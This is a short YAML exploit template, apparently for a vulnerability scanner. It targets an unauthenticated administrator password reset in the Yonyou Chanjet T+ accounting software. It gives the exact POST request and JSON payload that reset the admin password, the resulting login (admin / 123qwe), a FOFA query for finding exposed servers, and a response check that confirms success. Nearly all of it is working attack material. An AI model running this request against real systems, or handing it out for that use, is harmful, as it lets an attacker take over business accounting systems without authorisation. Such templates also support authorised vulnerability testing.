product: 用友畅捷通-TPlus
vName: 用友畅捷通-TPlus RecoverPassword.aspx 管理员密码修改
type: 访问控制
vID: [ ]
level: 3
vDesc: 用友畅捷通-TPlus RecoverPassword.aspx 存在未授权管理员密码修改漏洞，攻击者可以通过漏洞修改管理员账号密码登录后台
version: ''
note: '重置后用户名密码: admin 123qwe'
search:
  FOFA: app="畅捷通-TPlus" && product="畅捷通-TPlus"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17684749.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
      data: '{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '"value":true}'''
            logic: and